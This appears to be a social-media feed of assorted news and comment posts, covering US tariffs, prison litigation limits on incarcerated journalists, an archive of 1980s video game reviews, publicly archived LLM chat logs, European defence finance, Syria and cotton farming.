but the truth is that the sentence ends with "...liberate Ukraine from the Ukrainians and Gaza from the Gazans [and Palestinians as a whole]", but they never let them finish the sentence; could it be bootlicking!? 🤔😑🤐



Besides, whoever moves production to the US will move only part of production... they can't move everything. To import raw materials or otherwise necessary parts from Italy, they will still have to pay the tariffs... really useful. So in the end it's a rip-off anyway and not worth it. In a globalized world like this, Trump's logic is truly absurd. More taxes for everyone (in the US).


Federal law closes courthouse doors to incarcerated journalists


These days the president of the United States files frivolous lawsuits at an alarming clip, including against news outlets that displease him. He’s far from the only prominent public figure abusing the federal court system in this way, steering scarce judicial resources away from meritorious lawsuits by ordinary people who have suffered serious damages.

And yet, Congress has not seen fit to pass a federal “anti-SLAPP” law to stop billionaires and politicians from pursuing strategic lawsuits against public participation. But powerless prisoners? That’s another story. If they want access to the federal courts they need to navigate the Prison Litigation Reform Act — a maze of onerous procedural requirements. It’s supposedly intended to stop the courts from being burdened by inmates’ frivolous lawsuits.

We held a webinar to discuss the PLRA’s impact on incarcerated journalists and the journalists on the outside who cover the prison system, featuring Jeremy Busby, a journalist and Freedom of the Press Foundation (FPF) columnist who is incarcerated in Texas, and American Civil Liberties Union attorneys Nina Patel and Corene Kendrick. Patel is senior policy counsel at the ACLU Justice Division and Kendrick is the deputy director of the ACLU’s National Prison Project.

As Kendrick explained, the PLRA originated as one of the Clinton administration’s “tough on crime” initiatives as it pivoted right in preparation for the 1996 presidential election. The law was enacted despite a lack of evidence that incarcerated people file baseless lawsuits any more frequently than anyone else, presidents or otherwise. She said the law “singles out one disfavored group of people and categorically denies them equal access to the courts.”

She described how the harm extends beyond the impacted litigants, as the kinds of court filings foreclosed by the PLRA are “oftentimes the best way that information about conditions in our nation’s prisons and jails reach the public and members of the media.”

“The PLRA has, in practice, served as a real barrier for journalists to get any sort of information” about facilities that “get billions and billions of dollars a year to lock up human beings,” Kendrick said. “The ability to communicate with the outside world is so circumscribed and is monitored and recorded. And you know, once something gets to a federal court and it’s filed on the docket, it is out there.”

But when the court dismisses a case for procedural reasons without any consideration of whether the claims are true, all journalists are left with are untested allegations that they rarely have the resources to corroborate. “That happens all the time, and unfortunately, and it adversely affects journalists greatly,” Kendrick said.

Lawsuits are also the only recourse available to incarcerated journalists, who often report relentless retaliation when their work upsets prison officials. That’s what happened to Busby when he helped expose deplorable conditions inside the prison where he was housed when the COVID-19 pandemic hit in 2020. Busby said he was transferred to four prisons, each overcrowded with people sick with COVID, before landing in a cell without a mattress or sheets, where he was kept for six weeks. His property was damaged or seized, and he was written bogus disciplinary charges that were later overturned.

He brought a federal lawsuit, but because he was retaliated against in four different prisons, the judge said the PLRA required four separate lawsuits in four different courts. “I wasn’t able to successfully keep up with four active litigations in four different courts in four different counties, from the solitary confinement cell that I was being held in,” Busby explained, resulting in his lawsuits each being dismissed on procedural grounds before the merits of his claims could be adjudicated.

Busby is a college graduate and accomplished writer — if he can’t navigate the PLRA, it is all the more difficult for an average member of the prison population to do so. Even the experienced lawyers on the webinar acknowledged how challenging it can be to comply with the PLRA when representing their incarcerated clients. Incarcerated litigants, Busby noted, must also pay court fees — in his case, a $400 fee became $1,600 when his lawsuit was split into four.

“You don’t get paid for work here in Texas, and so most guys, they don’t even want the $400 thing against their account because their family members can maybe send $20 for toothpaste and deodorant every month or so, or every two or three months, and they don’t want to sacrifice their deodorant and toothpaste money to pursue this lawsuit,” he said.

So what’s the point of the PLRA? As Patel noted, “The courts are well equipped to throw out lawsuits that are frivolous,” and do so every day in cases involving non-incarcerated people. Patel believes the real problem the PLRA is meant to address isn’t that incarcerated people file so many invalid claims — it’s that they file so many valid ones.

With around two million people incarcerated in the United States, “a functional system where someone can go to the courts and have their constitutional violations in prison litigated and then compensated would break most prison systems in this country,” Patel explained. “That is the dirty truth of the PLRA.”

She added, “Everyone knows, and it’s not a secret, that it would bankrupt the system, and it would break it, and that we couldn’t do what we do in this country, which is lead the world in mass incarceration.”

Watch the full webinar here, and subscribe to our newsletters to get notice of future events.

Note: FPF Advocacy Director Seth Stern, who authored this article and moderated the webinar, is on the board of Busby’s nonprofit organization, JoinJeremy.


freedom.press/issues/federal-l…



But what happened to all those who praised Trump so much before the elections... even denying facts such as his attempted coup four years earlier... well... now that he has won, are you all happy? Idiots... nice idea of the right you have...


Why Trump's tariffs have TSMC cheering

The article comes from #StartMag and is reshared on the Lemmy community @Informatica (Italy e non Italy 😁)
TSMC will be exempt from the 100 percent tariffs on microchips imposed by Trump. Excellent news for the company and for Taiwan's entire economy. But trade tensions with America are not resolved.



Who are the financial giants backing the DSR Bank

@Notizie dall'Italia e dal mondo

A group of major international financial institutions, including J.P. Morgan Chase, ING and Commerzbank, has decided to take up the challenge of the multilateral bank designed to advance the defence projects of Europe and its allies. The Defence, Security and Resilience Bank (DSRB) in fact sets itself the goal



Preservationists at the Video Game History Foundation purchased the rights to Computer Entertainer, the first video game magazine ever written, and uploaded it for free. #News #VideoGames #archiving


Archivists Let You Now Read Some of the First Ever Reviews of Mario and Zelda


Some of the first reviews ever written for the original Legend of Zelda and Super Mario Bros. have been digitized and published by the Video Game History Foundation. The reviews appeared in Computer Entertainer, an early video game magazine that ran from 1982 to 1990. The archivists at the Foundation tracked down the magazine’s entire run and have published it all online under a Creative Commons license.

Computer Entertainer has a fascinating history. It was one of the only magazines to cover video games during the market crash of the mid 1980s. “Simply put, there weren't other video game magazines in this era, at least in the United States,” Phil Salvador, the Library Director at the VGHF, told 404 Media. “In many cases, this is the only American coverage we have for this period.”
“If we want to understand video game history, we need more than the games themselves. We need to understand how they were talked about and how they were made. Primary sources from the early years of the video game industry like Computer Entertainer are scarce. They give us insight into the story of video games that there's no way to reproduce,” Salvador said.
Image via VGHF.
Computer Entertainer was the newsletter for the Video Take-Out, a company that sold video games through the mail. “Because they were focused on retail products, they kept on top of the video game release calendar in a way that no other enthusiast magazine did in the 1980s,” Salvador said. “This magazine is one of the only reliable sources of American release dates for computer and console games during this era. Look up any console game from the 1980s on Wikipedia, and chances are, the American release date in the article comes from Computer Entertainer.”
Digging through the archives, I found the original Legend of Zelda review and read through a year’s worth of hype and handwringing leading up to its release. Computer Entertainer was on hand at CES to talk to the unproven Nintendo in February 1987. Zelda was already out in Japan, where it ran on the disk-based Famicom system.

The CE write-up noted that the NES was a cartridge system and that Nintendo had to make unheard of adjustments to make the game work right. “A Nintendo spokesperson told us that they have included a lithium battery with a 5-year life span in the cartridge to allow it to save information you need, so the disk drive is not needed,” CE wrote.
Image via VGHF.
Convincing Americans to buy a Famicom-style disk drive after they’d already bought the NES was thought to be a hard sell. “We do feel, however, that it is just a question of time before Nintendo introduces the disk drive in the U.S,” CE said. “Also, for the avid long-term gamer (count all our readers in that category!), the 5-year battery could prove frustrating as, when the battery dies, so does all the character information that has been stored on the cartridge.” CE needn’t have worried. Many of those batteries are still working today, almost 40 years later, and there’s a robust aftermarket in replacement parts when they fail.

Legend of Zelda finally came out in August of 1987 and CE gave it a glowing review, rating it 3.5 out of 4 stars. In the same issue, it gave Leisure Suit Larry and the Land of the Lounge Lizards a perfect 4 out of 4 stars. “There’s certainly no socially redeeming value to the game, which is what makes it so much fun,” CE said of the adventure game that would have nowhere near the cultural or social impact of Link and Zelda.
Image via VGHF.
“It's a totally different perspective to see someone trying to wrap their head around the original Super Mario Bros., or expressing skepticism about the idea of Nintendo selling a game console in the United States,” Salvador said.

The 1980s was a different era of games writing. “[Computer Entertainer] covered video and computer games as a function of their retail business to help customers better understand the game market,” Salvador said. “Being able to look back on what retailers thought about the game business back in the 1980s is a huge historical boon, but today, there's understandably more questions about the role of game criticism. Does it still make sense to cover games the same way Computer Entertainer did 40 years ago?”




High-tech frigates from Japan. Canberra bets on the “Mogami” class for its Navy

@Notizie dall'Italia e dal mondo

The Australian Navy has chosen Mitsubishi to build its next generation of frigates. A few days ago, the Australian Ministry of Defence announced that the upgraded version of the “Mogami” class




Roberto Natale (Rai board): a law that complies with the EMFA, now


@Giornalismo e disordine informativo
articolo21.org/2025/08/roberto…
“It is vital for the public service that a law implementing the European Media Freedom Act, which from tomorrow is also in force in the part concerning public services, arrives as soon as possible. Not



More than 130,000 Claude, Grok, ChatGPT, and Other LLM Chats Readable on Archive.org


A researcher has found that more than 130,000 conversations with AI chatbots including Claude, Grok, ChatGPT, and others are discoverable on the Internet Archive, highlighting how peoples’ interactions with LLMs may be publicly archived if users are not careful with the sharing settings they may enable.

The news follows earlier findings that Google was indexing ChatGPT conversations that users had set to share, despite potentially not understanding that these chats were now viewable by anyone, and not just those they intended to share the chats with. OpenAI had also not taken steps to ensure these conversations could be indexed by Google.

“I obtained URLs for: Grok, Mistral, Qwen, Claude, and Copilot,” the researcher, who goes by the handle dead1nfluence, told 404 Media. They also found material related to ChatGPT, but said “OpenAI has had the ChatGPT[.]com/share links removed it seems.” Searching on the Internet Archive now for ChatGPT share links does not return any results, while Grok results, for example, are still available.

Dead1nfluence wrote a blog post about some of their findings on Sunday and shared the list of more than 130,000 archived LLM chat links with 404 Media. They also shared some of the contents of those chats that they had scraped. Dead1nfluence wrote that they found API keys and other exposed information that could be useful to a hacker.
“While these providers do tell their users that the shared links are public to anyone, I think that most who have used this feature would not have expected that these links could be findable by anyone, and certainly not indexed and readily available for others to view,” dead1nfluence wrote in their blog post. “This could prove to be a very valuable data source for attackers and red teamers alike. With this, I can now search the dataset at any time for target companies to see if employees may have disclosed sensitive information by accident.”

404 Media verified some of dead1nfluence’s findings by discovering specific material they flagged in the dataset, then going to the still-public LLM link and checking the content.

💡
Do you know anything else about this? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.

Most of the companies whose AI tools are included in the dataset did not respond to a request for comment. Microsoft, which owns Copilot, acknowledged a request for comment but didn't provide a response in time for publication. A spokesperson for Anthropic, which owns Claude, told 404 Media: “We give people control over sharing their Claude conversations publicly, and in keeping with our privacy principles, we do not share chat directories or sitemaps with search engines like Google. These shareable links are not guessable or discoverable unless people choose to publicize them themselves. When someone shares a conversation, they are making that content publicly accessible, and like other public web content, it may be archived by third-party services. In our review of the sample archived conversations shared with us, these were either manually requested to be indexed by a person with access to the link or submitted by independent archivist organizations who discovered the URLs after they were published elsewhere across the internet first.” 404 Media only shared a small sample of the Claude links with Anthropic, not the entire list.

Fast Company first reported that Google was indexing some ChatGPT conversations on July 30. This was because of a sharing feature ChatGPT had that allowed users to send a link to a ChatGPT conversation to someone else. OpenAI disabled the sharing feature in response. OpenAI CISO Dane Stuckey said in a previous statement sent to 404 Media: “This was a short-lived experiment to help people discover useful conversations. This feature required users to opt-in, first by picking a chat to share, then by clicking a checkbox for it to be shared with search engines.”

A researcher who requested anonymity gave 404 Media access to a dataset of nearly 100,000 ChatGPT conversations indexed on Google. 404 Media found those included the alleged texts of non-disclosure agreements, discussions of confidential contracts, and people trying to use ChatGPT for relationship issues.

Others also found that the Internet Archive contained archived LLM chats.



After my article on systemic training, a contribution by Wolfgang Ulrich, who has his say on the subject. There is an interesting affinity among clinicians who pursue the project of a connection between the professional self and the, let's say, private one, in a way that is far from and alternative to the logic of so-called "integration".
From my blog (which brings me so much satisfaction).

massimogiuliani.it/blog/2025/0…



The man who has been searching for the Loch Ness monster for 30 years


Now... everyone can think what they like, and many will think this man is crazy.

But suppose tomorrow this monster comes out of the water and takes a little stroll on dry land for the benefit of photographers.

Steve Feltham will be able to fire off a hundred-megaton "I TOLD YOU SO, ASSHOLES!"

😁😁😁

The man who has been searching for the Loch Ness monster for 30 years: ilpost.it/2022/11/10/uomo-cerc…



#GiocAosta: tomorrow is the big day!

Hands are trembling a little.
Eyes are already shining.
The heart is beating.
Tomorrow it begins.
And it will be one beast of a party.

@Aosta



SYRIA. Suwayda under siege. Diary from a province on its knees


@Notizie dall'Italia e dal mondo
After the attacks of recent weeks, which never fully ceased, more than 170,000 displaced people have arrived in Suwayda from devastated rural areas. More than 32 villages have been burned, looted and made uninhabitable
The article SYRIA. Suwayda under siege. Diary from a



Cotton Farming in 2025


Cotton farming, known as the "white gold" of agriculture, remains one of the most vital pillars of the global textile economy. In 2025, it not only supports millions of livelihoods but is also evolving rapidly, driven by cutting-edge technologies, sustainable practices, and precision agriculture. Whether you’re a first-time grower or an experienced farmer, understanding how cotton is grown today can help you achieve higher yields, reduce costs, and farm more responsibly.
What is Cotton?
Cotton is a soft, fluffy natural fiber that grows around the seeds of the Gossypium plant. It’s used worldwide to manufacture clothing, bedding, industrial fabrics, and even paper products. Beyond fiber, cottonseeds are processed into oil and livestock feed, making it a multi-utility crop with immense commercial value.
Major Cotton-Growing Countries
As of 2025, the top cotton-producing nations include:
• India – World's largest cotton cultivator and consumer
• China – Heavy focus on high-yield, mechanized cotton
• United States – Known for exporting premium quality lint
• Pakistan – Major grower of short-staple cotton
• Brazil – Emerging leader in sustainable cotton exports
These countries benefit from suitable climates, advanced genetics, and extensive research infrastructure.
Suitable Conditions for Cotton
Cotton is a warm-season crop that demands specific conditions:
Factor | Ideal Range
Temperature | 21°C to 30°C
Rainfall | 600 mm to 1,200 mm annually
Soil Type | Sandy loam or black cotton soils
Soil pH | 6.0 – 7.5
Growing Period | 150–180 days (depends on variety)
It cannot tolerate frost and grows best in sunny, dry weather with low humidity during boll opening.
Preparing the Farm for Cotton
Effective land preparation sets the stage for a productive crop. Here’s how:
• Soil testing: Identifies pH, nutrient levels, and deficiencies
• Primary tillage: Deep plowing helps break hardpan and increase root penetration
• Secondary tillage: Harrowing and leveling using laser tools improve irrigation efficiency
• Organic additions: Apply farmyard manure or compost 2–3 weeks before sowing
Modern farmers also use biochar or vermicompost to enhance soil microbial activity and moisture retention.
Selecting Cotton Varieties
Choosing the right variety can significantly affect your yield and pest resistance. In 2025, the popular categories include:
• Bt Cotton: Genetically engineered to fight bollworms
• Hybrid Cotton: High-yielding but requires more inputs
• Desi Varieties: Hardy, pest-tolerant, and ideal for organic farming
• High-Density Varieties: Used in HDPS systems for closer spacing and better land utilization
• Drought-tolerant Strains: Designed for water-scarce areas
Seed Treatment Before Sowing
Treated seeds germinate better and resist early pests and diseases:
• Fungicides: Prevent damping-off, Fusarium wilt, and seed rot
• Insecticides: Protect from soil-borne insects
• Bio-stimulants: Enhance root development
• Rhizobium or Azospirillum: Inoculants for nitrogen fixation (used in organic farming)
Sowing Cotton Seeds
Sowing cotton seeds is a crucial step in cotton farming, directly influencing germination, plant spacing, and eventual yield. The ideal time for sowing depends on the region: April to June in North India and June to July in the South. Before sowing, seeds should be treated with fungicides or biostimulants to protect against early pests and diseases.
Farmers can use manual methods like dibbling or adopt mechanized sowing with seed drills for precision. The recommended sowing depth is about 4–5 cm, ensuring seeds are neither too shallow nor too deep. Spacing varies with variety: Bt and hybrid cotton usually need 75 × 30 cm, while high-density planting systems (HDPS) use 60 × 15 cm.
When to sow cotton?
• North India: April–June
• South/Central India: June–July
Growth Stages: From Flower to Boll
Cotton has distinct growth stages:
1. Vegetative (0–35 days) – root and leaf development
2. Square formation (35–50 days) – flower buds appear
3. Flowering (50–75 days) – needs optimal nutrition
4. Boll development (75–120 days) – water-sensitive period
5. Boll opening (120–160 days) – maturity, prepare for harvest